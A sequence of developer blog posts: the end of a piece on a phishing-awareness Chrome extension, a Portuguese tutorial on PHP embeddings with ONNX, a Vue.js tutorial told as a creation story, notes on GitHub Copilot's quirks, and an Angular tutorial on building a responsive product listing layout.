Reveal](https://chromewebstore.google.com/detail/link-reveal/fmmmcdmfaadidngnfnidhlmpgigmnhjh) and published it in the Chrome Web Store. I'm not the only one that thought of this. If you search the Store for terms like "link" or "phish", you'll find many extensions that relate to the anchor tag. If you're interested, you can also look at the [code](https://github.com/rebeccapeltz/link-reveal-ext). There are a couple of test pages you can use: [Page with a lot of different anchor tags](https://www.beckypeltz.me/link-reveal-ext/). [Page with no anchor tags](https://www.beckypeltz.me/link-reveal-ext/nolinks.html). ## Other Solutions that Preventing Phishing The Chrome extension is useful for getting a better look at the attributes of rendered anchor elements. In some cases, once an email web page is opened, the malware has already been installed. There are tools to investigate emails before they are opened. Any links containing suspicious URLs or URI can be removed before the user can access them. This [blog](https://www.leadfeeder.com/blog/best-email-tracking-tools/) summarizes some of those tools and how they work. ## Learn More About Cybersecurity The chart below shows that phishing is on the rise. ![Phishing attacks](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pzevx1bofghytcm6olnv.png) [credit: phishing-statistics](https://www.thesslstore.com/blog/phishing-statistics/) Cybersecurity awareness is important for developers. I joined [ICS2](https://www.isc2.org/) and learned a lot. See this [guide](https://rpeltz.gitbook.io/create-and-publish-a-chrome-browser-extension) for creating and publishing the browser extension described in this post.
rebeccapeltz
1,916,613
Gerando embeddings com PHP e ONNX
IA e PHP No campo da inteligência artificial (IA) e processamento de linguagem natural...
0
2024-07-15T21:13:56
https://dev.to/jonas-elias/gerando-embeddings-com-php-e-onnx-44gk
# IA e PHP No campo da inteligência artificial (IA) e processamento de linguagem natural (NLP), _embeddings_ são representações matemáticas de palavras, frases ou documentos que capturam seu significado semântico. Esses _embeddings_ são utilizados para aplicações que incluem busca semântica, análise de sentimentos, entre outros. A criação de _embeddings_ geralmente envolve técnicas de aprendizado de máquina que tradicionalmente são implementadas em linguagens como Python. No entanto, com a crescente popularidade da arquitetura [Open Neural Network Exchange](https://github.com/onnx/onnx) (ONNX), é possível integrar modelos pré-treinados em diferentes linguagens de programação, incluindo PHP. # Transformers PHP Para utilização dos modelos de inteligência artificial visando a geração de _embeddings_ no PHP, é possível utilizar a biblioteca [TransformersPHP](https://github.com/CodeWithKyrian/transformers-php), no qual foi projetada para ser funcionalmente equivalente à biblioteca [Transformers](https://pypi.org/project/transformers/) em Python, mantendo o mesmo nível de desempenho e facilidade de uso. O TransformersPHP utiliza o ONNX Runtime para executar os modelos pré-treinados. # Arquitetura Exemplo A seguir, é possível observar visualmente o funcionamento da geração de embeddings a partir da biblioteca TransformersPHP: ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q0cwdz4iv9mhsj62k2jc.png) # Uso Primeiramente, realize a configuração da imagem que será utilizada pelo container. Para utilização do TransformersPHP com suporte a geração de _embeddings_, é necessário o uso das extensões `FFI` e `Imagick`. A extensão `FFI` é a interface de integração entre código binário e a linguagem PHP. Já o `Imagick` é utilizado para o processamento dos modelos pré-treinados. ```docker FROM php:8.3 RUN apt-get update && apt-get install -y libffi-dev \ git \ unzip \ libmagickwand-dev \ libmagickcore-dev RUN docker-php-ext-configure ffi --with-ffi \ && docker-php-ext-install ffi RUN pecl install imagick \ && docker-php-ext-enable imagick RUN curl -sS https://getcomposer.org/installer | php -- --install-dir=/usr/local/bin --filename=composer RUN mkdir /embeddings WORKDIR /embeddings CMD ["/bin/bash"] ``` Após isso, é possível realizar a criação da imagem: ``` docker build -t image-php-ffi . ``` Seguida da execução do container: ``` docker run -it --rm --name container-php-ffi image-php-ffi ``` Dentro do container, é necessário primeiramente adicionar a dependência `codewithkyrian/transformers`, logo deve-se executar: ``` composer require codewithkyrian/transformers ``` Com isso, o ambiente está configurado e pronto para receber o código que fará a geração do embedding. Abaixo, é possível verificar que o código PHP faz referência ao modelo `Xenova/bert-base-uncased`, disponibilizado pela iniciativa [Xenova](https://huggingface.co/Xenova), no qual oferece modelos pré-treinados a partir da arquitetura ONNX. ```php <?php declare(strict_types=1); require_once './vendor/autoload.php'; use Codewithkyrian\Transformers\Transformers; use function Codewithkyrian\Transformers\Pipelines\pipeline; use function Codewithkyrian\Transformers\Utils\{memoryUsage, timeUsage}; Transformers::setup() ->apply(); $extractor = pipeline('feature-extraction', 'Xenova/bert-base-uncased'); $embeddings = $extractor('The quick brown fox jumps over the lazy dog.', normalize: true, pooling: 'mean'); var_dump($embeddings[0]); dd(memoryUsage(), timeUsage(milliseconds: true), count($embeddings[0])); ``` Realize a criação de um novo arquivo PHP, copie o código acima e após isso, execute o arquivo com `php nome_arquivo.php`. A primeira execução pode requerer um tempo de processamento maior por conta do _download_ do modelo pré-treinado. # Busca Semântica A geração de _embeddings_ pode ser benéfica para produzir sistemas de busca ao nível semântico, como abordo mais especificamente na palestra [Palestra APIs e LLMs](https://www.youtube.com/watch?v=fpQDvcj5Fb4). # Desvantagens Utilizar PHP e a arquitetura ONNX para gerar _embeddings_ pode apresentar algumas desvantagens. A maioria dos modelos _transformers_ são desenvolvidos com a arquitetura `PyTorch`, que é fortemente integrada à linguagem Python, limitando a realização de testes e desenvolvimento em outras linguagens. A conversão de modelos `PyTorch` para ONNX pode ser complexa ou até inviável, dependendo do suporte e das atualizações fornecidas pelos mantenedores dos modelos. # Conclusão Integrar IA e NLP com PHP utilizando a arquitetura ONNX é uma abordagem promissora que permite a utilização de modelos pré-treinados em uma linguagem de programação amplamente usada no desenvolvimento web. A biblioteca TransformersPHP demonstra ser uma ferramenta funcionalmente equivalente à sua contraparte em Python, permitindo a geração de embeddings com facilidade e eficiência. Embora existam desafios, como a complexidade na conversão de modelos e a necessidade de extensões específicas, a utilização de PHP para geração de embeddings pode abrir novas oportunidades para desenvolvedores web que desejam incorporar capacidades de NLP em suas aplicações sem a necessidade de migrar para outras linguagens. Com a evolução contínua dessas tecnologias e o aumento do suporte da comunidade, espera-se que as barreiras atuais sejam progressivamente reduzidas, tornando essa abordagem cada vez mais acessível e eficaz para diversos desenvolvedores e aplicações. ## Referências - [ONNX](https://github.com/onnx/onnx) - [Transformers PHP](https://github.com/CodeWithKyrian/transformers-php) - [Transformers PHP - DOC](https://codewithkyrian.github.io/transformers-php/) - [Transformers](https://pypi.org/project/transformers/) - [Transformers Hugging Face](https://huggingface.co/docs/transformers/index) - [Docker PHP](https://hub.docker.com/_/php) - [Xenova](https://huggingface.co/Xenova)
jonas-elias
1,916,645
God's Vue: An immersive tale (Chapter 2)
Chapter 2: Let There Be Light The Birth of An Instance After laying down the foundation of Eden,...
0
2024-07-14T16:56:31
https://dev.to/zain725342/gods-vue-an-immersive-tale-chapter-2-2ppp
vue, webdev, javascript, learning
**Chapter 2: Let There Be Light** **The Birth of An Instance** After laying down the foundation of Eden, the next step in the developer's journey was to bring light and structure to this nascent world. With a clear vision in his mind, he placed his fingers on the cosmic keyboard and conjured the `createApp` function—an entity of mystical origin, responsible for the initiation of every Vue application in existence. To perform this task, the `createApp` function demanded the root component as an object, and in return, it created an application instance. This instance, now imbued with the essence of the developer’s vision, was destined to play a crucial role in the development ahead. **Root and The Tree of Life** To fully understand the gravity of the transaction that took place between the `createApp` function and the developer, we must grasp the significance of the root component and its role. The root component serves as the origin from which every other child component blooms, regardless of size, to play its part in developing the new world. It encapsulates the structure and behavior of the entire creation process. The developer was fully aware of the importance of this transaction and its outcome. It was the only way to give birth to a new instance and proceed with his plans. According to some divine sources, the following commandments were authored by the developer to perform the holy transaction: ``` import { createApp } from 'vue' import App from './App.vue' const app = createApp(App) ``` After the transaction, an instance was born, allowing the Vue application to be organized into a tree of nested and reusable components, initially branching from the root itself. This hierarchical structure allowed for a modular and scalable approach to the creation of the intended world. Each component serving a specific purpose, contributing to the overall harmony and functionality of the creation. **Divine Configurations** With the application instance in hand, the developer knew the greatness he could achieve and the glory that awaited Eden. This new world would soon be unleashed in its full splendor. The application instance was more than just a beginning; it was a divine tool imbued with the power to shape the very fabric of Eden. Among its many powers, the `.config` object stood out, allowing the developer to configure app-level options with precision and care. The `.config` object was akin to a celestial scepter, giving the developer control over vital aspects of the application’s behavior. One such control was error handling, a safeguard to capture and manage errors from all descendant components: ``` app.config.errorHandler = (err, vm, info) => { // Handle the error gracefully console.error('Error captured: ', err) } ``` It was crucial for the developer to apply these divine configurations before mounting the application, to define its behavior and environment. These configurations ensured that the application operated according to the developer’s divine intent, setting the stage for a harmonious and well-ordered process. **App-Scoped Assets** As the developer continued to wield the power of the application instance, he discovered even more remarkable capabilities that lay within his grasp. Among these were the methods for registering app-scoped assets. These assets, such as components, were essential elements that would be accessible throughout the entire realm of Eden, ensuring that the creation was both cohesive and versatile. ``` app.component('MyComponent', { template: '<div>A holy component</div>' }) ``` The application instance was not merely a static foundation; it was a living, breathing entity capable of growth and adaptation. By registering app-scoped assets, the developer could make sure Eden could reuse and access key elements from anywhere within its vast realm. **Mounting the Creation** After fully exploring the vast potential of the application instance, the time had come for the developer to finally bring light to his nascent world and begin its true development. However, despite all the power at hand, the application instance refused to render anything unless the `.mount()` method was called. This method should be invoked after all app configurations and asset registrations. The return value of the `.mount()` method is the root component instance, unlike asset registration methods which return the application instance. The `.mount()` method also expected a container argument, symbolized by the ID `#app`. The container was a special vessel, an empty shell awaiting the essence of creation. Hence, the developer provided it with the `#app` and invoked the sacred method: ``` app.mount('#app') ``` Suddenly, a burst of light exploded throughout Eden, and it finally started to breathe. The content of the app's root component was rendered inside this container element, which acted as a frame through which the masterpiece of Eden was revealed, showcasing the intricate structure and boundless possibilities of the developer's creation. This act of mounting anchored the new world into the fabric of reality, setting the stage for the developer to begin what he was truly known for: the development of a great world.
zain725342
1,917,097
GitHub Copilot has its quirks
I've been using GitHub Copilot with our production codebase for the last 4 months, and here are some...
0
2024-07-15T14:23:37
https://dev.to/gauraws/github-copilot-has-its-quirks-34o1
ai, github, javascript, productivity
I've been using **[GitHub Copilot](https://github.com/features/copilot)** with our production codebase for the last 4 months, and here are some of my thoughts: **The Good:** 1. **Explains Complex Code**: It’s been great at breaking down tricky code snippets or business logic and explaining them properly. 2. **Unit Tests**: Really good at writing unit tests and quickly generating multiple scenario-based test cases. 3. **Code Snippets**: It can easily generate useful code snippets for general-purpose use cases. 4. **Error Fixes**: Copilot is good at explaining errors in code and providing suggestions to fix them. **The Not-So-Good:** 1. **Context Understanding**: It’s hard to explain the context to a GenAI tool, especially when our code is spread across multiple files/repos. It struggles to understand larger projects where changes are required in multiple files. 2. **Inaccurate Suggestions**: Sometimes it suggests installing npm libraries or using methods from npm packages that don’t exist. This is called [Hallucination](https://en.wikipedia.org/wiki/Hallucination_(artificial_intelligence)), where AI-generated code looks convincing but is completely wrong. 3. **Complex Code**: Occasionally, the code it generates is confusing and complex, making debugging harder. In those moments, I wish I had written the logic myself and let Copilot check for errors or bugs. Overall, GitHub Copilot has been a useful tool, but it has its quirks. When using large language models, the responsibility always stays with the programmer.
gauraws
1,917,213
From Requirements to Code: Implementing the Angular E-commerce Product Listing Page
Introduction Welcome back to my series on building a scalable Angular e-commerce...
28,006
2024-07-14T16:25:12
https://dev.to/cezar-plescan/from-requirements-to-code-implementing-the-angular-e-commerce-product-listing-page-23nn
angular, grid, tutorial, responsivedesign
## Introduction Welcome back to my series on building a scalable Angular e-commerce application! In the [previous article](https://dev.to/cezar-plescan/building-an-angular-e-commerce-app-a-step-by-step-guide-to-understanding-and-refining-requirements-hoe), I embarked on the crucial journey of understanding and refining the requirements for our Minimum Viable Product (MVP). Through collaborative discussions with stakeholders and careful analysis, we crafted a clear user story and acceptance criteria for the first feature: displaying a list of products. ### Overview In this article, I'll take the next crucial step: translating those requirements into tangible code. I'll delve into the initial implementation of the product listing page, exploring the thought process behind key decisions and showcasing practical techniques for creating a responsive and visually appealing layout. ### What I'll cover **Component Design**: Identifying the core components needed for the product list and establishing their relationships. **Data Modeling and Mock Data**: Creating a data structure to represent our products and utilizing mock data to simulate a real-world scenario. **Angular Material Integration**: Leveraging the power of Angular Material components to create a visually appealing and user-friendly interface. **Responsive Grid Layout**: Implementing a flexible grid layout that adapts to different screen sizes, ensuring optimal display across devices. **Spacing and Layout Refinements**: Exploring different techniques for achieving the desired spacing and visual balance between product cards. By the end of this article, you'll have a solid understanding of how to transform user stories and acceptance criteria into working Angular code, setting a strong foundation for building out the rest of our e-commerce application. ### Motivation My aim is to provide a practical, step-by-step guide that goes beyond theoretical concepts. I want to share my thought process as a developer, highlighting the decisions I make and the challenges I encounter along the way. By following along, you'll gain valuable insights into how to approach frontend development in a real-world scenario. The goal of this article is not just to show you _how_ to build a product list, but _why_ certain decisions are made, cultivating a deeper understanding of the architectural considerations involved in creating a successful e-commerce application. Whether you're a beginner or an experienced Angular developer, this article will equip you with the knowledge and skills to build the foundation of a successful e-commerce application. ### A Quick Recap of the User Story and Acceptance Criteria Let's revisit the refined user story and acceptance criteria that will guide the implementation: > _**User Story**_: > > _As a potential customer, I want to see a clear and visually appealing list of products with their images, names, and prices, so that I can quickly browse and compare items before making a purchase decision._ > > _**Acceptance Criteria**:_ > - _Layout_: > - _The product listing page displays products in a grid layout._ > - _Each row of the grid contains a maximum of 4 product items._ > - _The layout is responsive and adapts to different screen sizes._ > - _Product Card Content:_ > - _Each product card displays a clear product image._ > - _The product name is prominently displayed below the image._ > - _The price is displayed clearly, using the appropriate currency symbol._ > - _Functionality:_ > - _The product list is initially loaded when the user navigates to the product listing page._ > - _MVP Considerations:_ > - _The product list does not include pagination or infinite scrolling in this initial version._ > - _Error handling for data fetching issues will be addressed in a later iteration._ > - _Technical Notes:_ > - _Data Source: Product data will be initially hardcoded on the frontend._ > - _UI Framework: The Angular Material library will be used for styling and components._ ### An overview of the path from requirements to code Now, it's time to translate these requirements into actual code. While there's no one-size-fits-all process, I'll share the high-level approach I typically take: 1. **Project setup**: Create the Angular project and any essential initial configurations. 2. **Component identification and hierarchy**: Identify the visual components needed for the product listing page and define their hierarchical relationships. This involves deciding which components will contain other components and how they will interact. 3. **Data retrieval**: Determine the data source and how to fetch and manage the product data within the application. 4. **Layout and styling**: Create the visual layout of the product list and style the individual product cards to meet the design requirements. I'll discuss this in more detail later. While these steps provide a solid starting point, it's important to remember that the development process is often iterative. We might discover new requirements, encounter unexpected challenges, or need to make adjustments based on user feedback. Therefore, it's crucial to maintain flexibility in our planning and be prepared to adapt as we go. In the next section, I'll delve deeper into each step of the implementation, starting with the identification of components and their hierarchical structure. ## Identifying the component structure ### Create the Angular project Before identifying the component structure I need to create a new project with the Angular CLI command: ```bash npx --yes --package @angular/cli@18 ng new Angular-Architecture-Guide --defaults --standalone=true ``` If you don't have npx installed, you can run: ```bash npm install -g npx ``` _**Note**: You can also find the code for this project on Github at https://github.com/cezar-plescan/Angular-Architecture-Guide/. The `master` branch contains the initial project setup._ ### Creating the main components Analyzing the user story, I identify two main visual elements: - **the product list container**, a single element which holds all visible products. - **product elements**, each containing product details within the list container. I immediately notice that there's a parent-child component relationship between the list and each product. Here are the two components I'll create: - **`ProductListComponent`** - the container for the entire product list - **`ProductCardComponent`** - a reusable component for displaying individual product information. To create these components, I'll use the Angular CLI commands: ```bash ng generate component product-list ng generate component product-card ``` ### Building the initial component structure Now that I have a clear vision for the product listing page, I'll start sketching out the structure of the Angular components. The `ProductListComponent` will act as an orchestrator, managing the display of multiple `ProductCardComponent` instances, each representing a single product. To get a better sense of the data flow and component interaction, I'll create a basic template for the product list:{% embed https://gist.github.com/cezar-plescan/68afb65852c1876cde48155c2edead30 %} This template outlines my intent: I'll iterate over a `products` array and pass each `product` object as an input to a `ProductCardComponent`. However, there are some missing pieces: - I haven't defined the `products` array and how I'll fetch the product data. - The `ProductCardComponent` needs a `product` input property to receive the data from the parent component. - I need a `Product` interface to define the structure of each product so that both the list and the card components can work with the data consistently. To address these missing pieces, I'll start by defining the `Product` interface, as this is the foundation for working with product data in my components. Then, I'll create the input property in the `ProductCardComponent` and, finally, provide some initial product data to populate the list. ### Creating the `Product` interface Since both components will be working with product data, it makes sense to define a common structure for this data. To achieve this, I'll create an interface called `Product`: {% embed https://gist.github.com/cezar-plescan/8c6c5695db1524060095636a445bab83 %} Now, the question is: _where should I place this interface file?_ Since it's not specific to either component but will be used by both, a shared location makes the most sense. Within the `src/app` directory, I'll create a new folder named `shared`. This will serve as a central repository for code that's used multiple times across the application. Inside `shared`, I'll create another folder called `types` to specifically house our data interfaces. Therefore, the `product.interface.ts` file will reside in the `src/app/shared/types` folder. This approach promotes reusability and maintainability, as it makes the `Product` interface easily accessible from anywhere in our application. ### Add an input property to the `ProductCardComponent` Now that I have the `Product` interface, I need a way for the `ProductListComponent` to pass the data for each individual product to the `ProductCardComponent`. To achieve this, I'll add an input property to the `ProductCardComponent`. I'll call this input property `product` since it will be used to hold the data for a single product. Here's the updated code for `product-card.component.ts`: {% embed https://gist.github.com/cezar-plescan/bf311a37829864791577cbab4ad96eb2 %} ### Define the product catalog data Since we don't yet have a backend API to provide product information, I'll use mock data for our initial implementation. This allows me to focus on building the frontend components and their interactions without being blocked by the backend development. To keep my code organized, I'll create a separate file to store this mock data. I'll name it `product-data.ts` and place it within the `product-list` folder. This makes sense because the mock data is directly related to this specific feature and isn't currently needed elsewhere in the application. Here is what the file will contain: {% embed https://gist.github.com/cezar-plescan/c8892090328bb7b80449ab3ed62ca48a %} Now that I have the product mock data, I can load it into the `ProductListComponent` to be displayed on the product listing page. Here's the relevant code: {% embed https://gist.github.com/cezar-plescan/3ec636de5e488dbbccac8f32a865b681 %} ### Displaying the products Now that I've defined the data models and loaded the mock product data, I'll bring the product listing page to life. #### Rendering the product list First, I need to tell the main application component `AppComponent` to display the `ProductListComponent`. This is where the product list will actually be rendered. I can do this by updating the `app.component.html` file: {% embed https://gist.github.com/cezar-plescan/8854bbbf986859739d678aad76a5f1e4 %} #### Displaying individual products Next, I need to populate the `ProductCardComponent` template to display the details of each individual product. For now, I'll keep it simple to verify that the data is loading correctly. Note that I'm using the `currency` pipe to format the price in Euros. {% embed https://gist.github.com/cezar-plescan/7a072511d2d361e7d28333e8d9c5d9b6 %} #### Using `mat-card` from Angular Material for styling As mentioned in the acceptance criteria, I'll be using Angular Material to style the product cards. I'll install the package using the Angular CLI. This command will prompt you to choose a pre-built theme and set up additional configuration options: ```bash ng add @angular/material ``` Then I'll update the `ProductCardComponent` template to use the `mat-card` component for styling: {% embed https://gist.github.com/cezar-plescan/9b55b5ad4d24583c52f626d98cfd79fa %} _**Note**: You can find more details about using the `mat-card` component in the official Angular Material documentation: https://v18.material.angular.io/components/card/overview._ Next, I run the app (using `ng serve` or `npm run start`) and see a list of basic product cards displayed on the page. However, the layout isn't quite right and the image is taking up the full width of the container, no matter the window size. ![Basic product list](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pa7uq5thx12aft915j3n.png) _**Note**: You can see the code at this stage in the Github repository at this specific revision: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/eda71069e44b6615267f289627f94d01a3e50d2b._ I now need to refine the layout of the product list and style the product cards to make them visually appealing and responsive. I'll cover this in the next section. ## Preparing the layout and styling the components When I approach the design and layout of a component, I find it helpful to abstract away the specific content initially and focus on the underlying structure. This can save time and effort later on. I think of it like an architect designing the blueprint of a house before deciding on the interior decorations. The blueprint establishes the foundation and framework, while the decorations can be added and modified later. In my case, I'll consider the product list as a container with multiple items. This abstract view allows me to create a flexible and adaptable layout that works well across different screen sizes. Here's the step-by-step approach I typically follow: 1. **Abstraction**: define the core structure of the component without focusing on specific content. 2. **Choose a Design Approach**: select a layout strategy based on the design goals and responsiveness requirements. 3. **Implementation**: translate the chosen design approach into code, using CSS to create the layout structure and style the elements. This methodical process ensures that the resulting layout is robust, adaptable, and visually appealing, regardless of the specific content it will hold. _**Important Note**: In this initial implementation, I'm solely focused on creating the product list functionality. The examples and code snippets provided here only showcase the `ProductListComponent` and its child `ProductCardComponent`. In a real-world e-commerce application, we would typically have a more comprehensive layout that includes a header, navigation menu, page title, footer, and other elements. These elements would be incorporated into the overall application structure using additional components and routing. However, for the sake of clarity and to emphasize the core principles of building a responsive product list, I'm keeping the current implementation focused and minimal._ ### The Power of Abstraction in Layout Design Here's why abstracting away content initially is a valuable approach: **Focus on Core Structure**: By ignoring the specific content initially, we can focus on the fundamental layout principles – how the items should be arranged, the spacing between them, and how the layout should respond to different screen sizes. This allows us to create a solid foundation for our design. **Flexibility and Reusability**: Abstracting the layout makes it easier to reuse the same structure for different types of content. For example, the same grid layout we create for product cards could be used for blog posts, team member profiles, or other types of content. **Simplified Testing**: With a basic layout structure in place, we can test the responsiveness and adaptability of the design without being distracted by the details of the content. This allows us to catch any layout issues early on and iterate on the design more effectively. **Collaboration**: An abstract layout is easier to communicate and discuss with designers and stakeholders. They can focus on the overall structure and flow of the content without getting bogged down in the specifics of each element. **Gradual Refinement**: Once the basic layout is established, we can then gradually add and style the specific content elements. This allows for a more iterative and focused approach to design and development. In our e-commerce application, I can abstract the product list as a container (`product-list`) with multiple items (`product-card`). My focus will be on creating a responsive layout that adapts to different screen sizes and ensures proper spacing between items. Once this foundation is established, I'll design and style the individual product cards, filling them with the relevant content (images, names, prices, descriptions). ### Mobile-First Design: Why it matters Next, I need to choose a design approach. Knowing that I'm aiming for a responsive design that works well on various screen sizes, from mobile to desktop, I'll adopt the **Mobile-First Design** approach, a strategy that prioritizes designing and building the mobile version of a website or application first, then progressively enhancing it for larger screens. Here is why Mobile-First Design is often the preferred approach in modern web development: **Progressive Enhancement**: With a mobile-first approach, we start with a simpler, more streamlined layout and then progressively add enhancements for larger screens. This is generally easier and more efficient than trying to strip down a complex desktop design to fit mobile constraints. It also allows for more flexibility and scalability as we can easily add new features or design elements for larger screens without compromising the mobile experience. **Mobile Usage Dominance**: The majority of web traffic now originates from mobile devices. By starting with a mobile-first design, we prioritize the experience for the largest segment of our audience. This ensures that the majority of our users have a smooth and optimized experience right from the start. **Content Prioritization**: Mobile screens have limited real estate, forcing us to focus on the most essential content and interactions. This naturally leads to a cleaner and more streamlined design that translates well to larger screens. Desktop-first designs can sometimes feel cluttered or overwhelming when adapted to mobile, as they might include elements that are less relevant or usable on smaller screens. **Performance Optimization**: Mobile devices often have slower connections and less processing power than desktops. Designing for mobile first forces us to optimize performance from the beginning. This optimization benefits users on all devices, as even desktop users appreciate fast-loading pages. **SEO Benefits**: Search engines like Google prioritize mobile-friendly websites in their rankings. Adopting a mobile-first approach can improve our website's SEO and increase its visibility in search results. _**Note**: If you're interested in learning more about Mobile-First Design, check out these resources:_ - _https://www.youtube.com/watch?v=W1dGYykSR-4: A video tutorial explaining the concepts and benefits of mobile-first design._ - _https://www.manypixels.co/blog/web-design/mobile-first-design: An article discussing the importance of mobile-first design and providing practical tips for implementation._ - _https://www.sanity.io/glossary/mobile-first-design: A concise definition and overview of mobile-first design principles._ With this mobile-first mindset, my approach will be to initially design and style the product list for smaller screens (mobile devices). Then, as I move to larger viewports (tablets and desktops), I'll progressively enhance the layout to accommodate more columns and potentially additional content. ### Implementing the layout for small screens With the mobile-first approach in mind, I'll start implementing the layout for smaller screens. Currently, the product cards are stacked vertically, which is the correct behavior for mobile. However, they are lacking spacing between them. #### Determining where to apply spacing The question is: where should I add this spacing? Remembering the principle of separation of concerns, it makes sense to apply the spacing within the `ProductListComponent`, as this component controls the overall layout of the product list. The `ProductCardComponent` should focus on presenting the individual product details, not the spacing between cards. #### Choosing a spacing strategy Now, I need to decide how to add this spacing. There are a few options: - **margins on product cards**: This involves adding a margin to the `product-card` elements, creating space around each card. - **padding on the container**: This involves adding padding to the `product-list` container, creating space between the cards and the container's edges. - **flexbox `gap` property**: If I use Flexbox for the layout, I can leverage the `gap` property to easily control the spacing between items. I'll examine each approach to determine the best fit for the mobile-first layout. #### Apply margins around list items In the product list template, I'll wrap each `ProductCardComponent` element within a `div.product-card`: {% embed https://gist.github.com/cezar-plescan/80b47bfadc416e12872f207ba21a858f %} This provides a target for applying margins directly to the product card wrapper elements, as shown below: {% embed https://gist.github.com/cezar-plescan/25de93916b5fcec0eeea858a875f640c %} After reloading the app, I see a nice, even spacing around each product card. The vertical spacing between adjacent cards is exactly `1rem`, as expected. Here are some screenshots: 1. the first one is the initial display, without any spacing 2. the list after applying the margins 3. the last card has no bottom margin ![apply margins](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ig9h2kgem8ngfytthlpo.png) However, there's one important issue: the last product card doesn't have a visible bottom margin! #### Understanding margin collapsing This behavior is due to a CSS concept called **margin collapsing**. In essence, when vertical margins (top and bottom) are applied to adjacent elements, they sometimes combine into a single margin rather than adding up. This happens when there's no padding, border, or inline content to separate the elements. In this case, each `div.product-card` element has a bottom margin. However, the last product card's bottom margin collapses with the bottom margin of its parent container. This is why we don't see a visible margin below the last card. _**Note**: More details about margin collapsing can be found at:_ - _https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_box_model/Mastering_margin_collapsing The MDN Web Docs article provides a comprehensive guide to understanding margin collapsing, its rules, and how to work with it effectively._ - _https://www.joshwcomeau.com/css/rules-of-margin-collapse/ This interactive blog post by Josh Comeau offers a visual and engaging explanation of margin collapsing, making it easier to grasp the concept._ #### Fixing the margin collapsing issue One of the fixes is to apply a bottom padding to the `.product-list` container element and remove the bottom margin from the last `.product-card` child: {% embed https://gist.github.com/cezar-plescan/7742228fcb73ba831391561b4da9b156 %} {% embed https://gist.github.com/cezar-plescan/ef84e7b17f6a1baf5be9fb9d913bd5d5 %} Now, with these changes applied, the spacing between all product cards appears as expected, with even margins all around. You can check out the code with these changes in the GitHub repository at this revision: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/24ed3e51e3c988c452060c2b1cdd412c4d3786c4. #### Apply padding around list items Another solution for creating spacing around the cards is to use paddings on their wrappers: {% embed https://gist.github.com/cezar-plescan/f574b8e0ff2b3e6bface0008f0be64a4 %} ![product card paddings](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ud9hpecrqu03zxbqh20k.png) With this simple change, each product card now has `1rem` of padding on all sides, visually separating the content from the card's edges. However, as you can see in the screenshot, this approach leads to a new issue: The vertical spacing between adjacent cards is double the intended space because the bottom padding of one card is added to the top padding of the next. To resolve this double spacing issue, I can selectively remove the bottom padding from all cards except for the last one in the list. I'll achieve this using the `:not(:last-child)` pseudo-selector: {% embed https://gist.github.com/cezar-plescan/e3146bee1b7e92b73833cb800b49a943 %} You can see the code with these changes in the GitHub repository at this revision: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/1d9d60a6319dffee2453eaf4072f708c0d8212a6. #### The philosophy of spacing: Parent vs Child responsibilities In the previous solutions, spacing was defined within the `.product-card` selector (the child elements). However, let's revisit the fundamental question: Who should be responsible for defining spacing in a parent-child layout relationship? **Parent's Role: Outer Spacing** Consider an empty parent container. To create inner spacing, we intuitively apply padding to the parent. This is because padding defines space _within_ an element, pushing its content inwards. While we could achieve a similar visual effect with margins _outside_ the parent, it's not semantically accurate because margins create space _around_ an element, not within it. **Child's Role: Inner Spacing** Now, let's add child elements to the parent. These children will naturally reside within the boundaries defined by the parent's padding. The question then becomes: Who controls the spacing _between_ these child elements? The answer lies in the concept of margin. Margins create empty space _around_ elements, so it's the responsibility of each child element to define its own margin to create separation from its siblings. In our product list, applying `margin-bottom` to each product card (except the last) achieves this goal. If we used padding instead, we'd imply that the space between cards is part of the card itself, which is not semantically correct. Based on this reasoning, a more effective implementation would be: {% embed https://gist.github.com/cezar-plescan/d196f8cc68ed8c3e7fd7b2b3ffd5c17c %} The code with these changes can be found at this specific revision: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/e31fe48758da28321b65125033c9f3cdea151e24. #### Using Flexbox for spacing Another elegant approach to defining spacing is to leverage the power of CSS **Flexbox**. This method aligns perfectly with the principle of separation of concerns, distinguishing between spacing around the list and the space between its items. Here's the implementation: {% embed https://gist.github.com/cezar-plescan/5aa12c9c206b3912218a28325288d076 %} The `gap` property does the heavy lifting here, handling the spacing between the cards. In our current vertical layout, this translates to vertical spacing only. With this approach, we eliminate concerns about margin collapsing, simplifying our code and ensuring consistent spacing between cards. The simplicity of this CSS is a major advantage. Flexbox is a powerful layout tool, and in this case, it allows us to achieve the desired layout with minimal code. For now, I'll refrain from declaring a definitive "best" approach. Let's continue exploring how both margins and Flexbox adapt when we introduce styling for larger screens. This will give us a more comprehensive understanding of their strengths and weaknesses in different scenarios. You can see the changes up to this point in the GitHub repository: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/ca8ab55b9529049da501f7191062651900d98e2c. ### Implementing the layout for larger screens As I transition to designing the layout for larger screens, a key question arises: What should determine the number of product cards per row? Should it be based on the device's screen size, or the available width of the product list container itself? While screen size is a factor, my experience has taught me that relying solely on it can be restrictive. Different devices have varying widths, and the width of our container might change due to the overall page layout or user preferences. Therefore, I believe it's crucial to base the number of cards per row on the available container width. This approach ensures a more flexible and adaptable layout. #### Why container width is key for Responsive Design Here's why prioritizing container width leads to a more adaptable and user-friendly layout: - **Content containers can change**: The width of the product list container might change depending on the overall page layout, user preferences, or other design considerations. Basing the layout on the container width ensures it adapts to these changes dynamically. - **Maximizing space utilization**: By considering the container width, we can maximize the use of available space, ensuring that as many products as possible are displayed without overcrowding or creating an overly sparse layout. - **Graceful degradation**: Users might resize their browser windows or use devices with non-standard screen sizes. Basing the layout on container width allows the design to gracefully adjust and avoid breaking or looking odd. #### Choosing the right implementation Let's revisit the acceptance criteria to guide the implementation: > - _The product listing page displays products in a grid layout._ > - _Each row of the grid contains a maximum of 4 product items._ > - _The layout is responsive and adapts to different screen sizes._ Since I need to accommodate more cards per row on larger screens, CSS **Grid** is the perfect tool for the job. It allows me to create a flexible, responsive grid layout that adapts to different screen sizes and content while maintaining a visually pleasing arrangement. To create a dynamic layout while adhering to these constraints, I'll set both minimum and maximum widths for the product cards. This ensures the cards have enough space to display their content comfortably but don't become overly large on wide screens. In the next 